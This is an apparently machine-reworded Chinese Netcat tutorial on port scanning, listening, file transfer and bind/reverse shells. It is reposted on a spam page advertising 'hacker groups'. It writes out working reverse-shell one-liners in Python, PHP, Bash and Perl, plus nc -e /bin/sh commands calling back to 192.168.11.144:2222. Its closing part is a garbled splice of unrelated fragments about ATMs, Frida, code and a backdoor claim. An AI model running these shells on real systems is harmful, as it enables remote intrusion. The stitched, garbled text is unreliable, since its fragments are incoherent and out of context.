最近在做浸透检验的时分遇到了端口监听和shell的反弹问题，在这个进程中自己对Netcat这一款神器有了新的知道，现将一些Netcat的用法做一个小总结，期望对各位有协助！

Netcat简介

Netcat是一款十分知名的 *** 工具，简称“NC”,有浸透检验中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、长途文件传输、还可以完成长途shell等功用。总归功用强壮，可以用一句较为幽默的话来描述NC的强壮——“你的想象力是限制NC的瓶颈”。

Netcat选项参数阐明

 

功用阐明：端口扫描、端口监听、长途文件传输、长途shell等等;

语　　法：nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<推迟秒数>][-o<输出文件>][-p<通讯端口>][-s<来历位址>][-v...][-w<超时秒数>][主机称号][通讯端口...]

参　　数：

-g <网关> 设置路由器跃程通讯网关，最多可设置8个；

 -G <指向器数目> 设置来历路由指向器，其数值为4的倍数；

 -h 在线协助； 

-i <推迟秒数> 设置时刻距离，以便传送信息及扫描通讯端口；

 -l 运用监听方式，管控传入的材料；

 -n 直接运用IP地址，而不通过域名服务器；

 -o <输出文件> 指定文件称号，把来往传输的数据以16进制字码倾倒成该文件保存；

 -p <通讯端口> 设置本地主机运用的通讯端口；

 -r 乱数指定本地与远端主机的通讯端口；

 -s <来历位址> 设置本地主机送出数据包的IP地址；

 -u 运用UDP传输协议；

 -v 显现指令实行进程；

 -w <超时秒数> 设置等候连线的时刻；

 -z 运用0输入/输出方式，只在扫描通讯端口时运用。

Netcat简易运用衔接到长途主机

 

指令：nc  -nvv Targert_IP  Targert_Port

 

监听本地主机

 

指令：nc  -l  -p  Local_Port

 

端口扫描

扫描指定主机的单一端口是否敞开

 

格局：nc  -v  target_IP  target_Port

&nbsp

这儿也需求留心几个问题：

;

扫描指定主机的某个端口段的端口敞开信息

 

格局：nc  -v  -z  Target_IP   Target_Port_Start  -  Target_Port_End

 

扫描指定主机的某个UDP端口段，而且回来端口信息

 

格局：nc -v   -z  -u  Target_IP  Target_Port_Start   -   Target_Port_End

 

扫描指定主机的端口段信息，而且设置超时时刻为3秒

 

格局：nc  -vv（-v） -z  -w  time  Target_IP   Target_Port_Start-Targert_Port_End

 

端口监听

监听本地端口

 

格局：nc  -l  -p  local_Port

 

注：先设置监听（不能呈现端口抵触），之后假设有外来访问则输出该详细信息到指令行

监听本地端口，而且将监听到的信息保存到指定的文件中

 

格局：nc -l  -p local_Port > target_File

衔接长途系统

 

格局：nc Target_IP  Target_Port

 

之后可以工作HTTP恳求

FTP匿名勘探

 

格局：nc Targert_IP  21

 

文件传输

传输端：

 

格局：nc  Targert_IP  Targert_Port  <  Targert_File

 

接纳端：

 

格局：nc   -l  Local_Port  >  Targert_File

 

简易谈天

本地主机

指令：nc   -l   8888

长途主机

指令：nc Targert_IP    Targert_Port

蜜罐

作为蜜罐运用1：

指令：nc -L -p  Port

注：运用“-L”参数可以不断的监听某一个端口，知道Ctrl+C停止

作为蜜罐运用2：

指令：nc -L -p  Port >log.txt

注：运用“-L”参数可以不断的监听某一个端口，知道Ctrl+C停止，一同把成果输出到log.txt文件中，假设把“>”改为“>>”即追加到文件之后。

这一个指令参数“-L”在Windows中有，现在的Linux中是没有这个选项的，可是自己可以去找找，这儿仅仅想到了之前的这个运用，所以提出来简略介绍一下！

获取shell

简述：获取shell分为两种，一种是正向shell，一种是方向shell。假设客户端衔接服务器端，想要获取服务器端的shell，那么称为正向shell，假设是客户端衔接服务器，服务器端想要获取客户端的shell，那么称为反向shell

正向shell

本地主机：

指令：nc   Targert_IP  Targert_Por针对一个数据集的特征构建有许多 *** ，所得的特征也各有不同。今天出于实验的考虑，我们用两种 *** 来构建特征。t 

方针主机：

指令：nc  -lvp  Targert_Port   -e  /bin/sh  

反向shell

本地主机：

指令： nc -lvp  Target_Port

方针主机：

指令： nc  Targert_IP Targert_Port  -e /bin/sh

特殊情况——方针主机上没有Netcat，怎样获取反向shell

在一般情况下，方针主机上一般都是不会有Netcat的，此刻就需要运用其他代替的 *** 来完成反向链接到达进犯主机的意图，下面简略的介绍几种反向shell的设置。

python反向shell

方针主机端实行句子：

 

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.144",2222));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 

本地主机

方针主机

PHP反向shell

方针主机端实行句子：

 

php -r '$sock=fsockopen("192.168.11.144",2222);exec("/bin/sh -i <&3 >&3 2>&3");'

本地主机：

 

方针主机：

Bash反向shell

方针主机端实行句子：

bash -i>＆/dev/tcp/192.168.11.144/2222 0>＆1

本地主机：

方针主机：

Perl反向shell

方针主机端实行句子：

 

 

perl -e 'use Socket;$i="192.168.11.144";$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

本地主机

 

方针主机

 

注:书写的时分必定要注意这儿单引号、双引号是英文格局的，否则会报过错！

总结：有一句话为“温故而知新”，一同又有一句话为“实践出真知”，当这两句话一同饯别的时分，就会擦出不一样的火花，你会看到你之前未见到的，把握到你之前陌生的技术！Netcat当然查询的厂商列表如下：好用，可是也要通过实践才知道，那你还在等什么呢？

*本文作者：Fly前途似锦，转载请注明来自 FreeBuf.COM

黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结

*/#define _GNU_SOURCE补偿：“瑞士军刀”Netcat使用 *** 总结

黑客 *** 群怎样工作插件ATM包括两个首要的部分：cabinet和safe。Cabinet也就是ATM的主体部分包括ATM计算机，这是与 *** 设备、读卡器、键盘、现金出口等设备相连的。Safe部分是由钢筋做成的，含有吐钞口和钞票进口等模块。计算机一般工作的都是Windows系统，不过是一种专门为ATM所规划的嵌入式版别。只需管理员或许访问Windows系统，其他用户是不能访问的。所以用户看到的运用是工作在kiosk方式下的。 false先去找到user32.IsMenu ***

root soft nofile 100000工作完我们继续触发溃散。Arbitrary Code Guard（任意代码关照卫士）黑客 *** 群

tp_sizeof_priv int32

例如 bcrypt 算法就运用了类似思想，它在核算进程中一再访问 4KB 的内存空间，然后消耗带宽资源。

[1][2]黑客接单网

我们来试试将frida注入父进程。 “瑞士军刀”Netcat使用 *** 总结

黑客 *** 群图5Firefox40中用户禁用未签名的扩展2、运维堡垒机cknife：[项目地址]，这把刀可以自定义各种通讯 *** 和php实行函数用于绕过waf检测。实践检验下来，的确许多家waf的默许战略对自定义方式阻挠无力。

密文和盐的更新与不可追溯#include "sodium.h"黑客 *** 群

服务端+应战支撑和附和的特性。

微软的文件数字签名验证我们必定听说过。微软为系统的要害文件引入数字签名的机制，是为了维护系统的无缺性。因为操作系统的要害文件的无缺性十分重要，只需确保了它们的无缺和不被篡改，才华确保系统的安全和平稳工作。Windows 10系统就内置了文件签名验证的东西，可以很方便地检查系统文件的无缺性和安全性。一同，关于外来设备的程序和驱动，也可以检查。通过它可以找出系统中“不明身份”的文件。

{fonttbl{f0froman Tms Rmn;}{f1fdecor Symbol;}{f2fswiss Helv;}} "os",“瑞士军刀”Netcat使用 *** 总结

MIKEY-SAKKE存在后门，可解密全部VoIP通讯mysql_query($sql) or die(mysql_error());096b0091 ba555593c5 mov edx,0C5935555h 假设因为网速太慢等原因我们只能进行时刻短更新，所以我们要保证先发送关于危险网站的信息，更新真的需求精密核算。我们还和Google的紧缩团队协作，把我们的数据尽或许的紧缩的越小越好，这样才华保证数据传输尽或许不给用户的运用构成影响。
本文标题:黑客 *** 群:“瑞士军刀”Netcat使用 *** 总结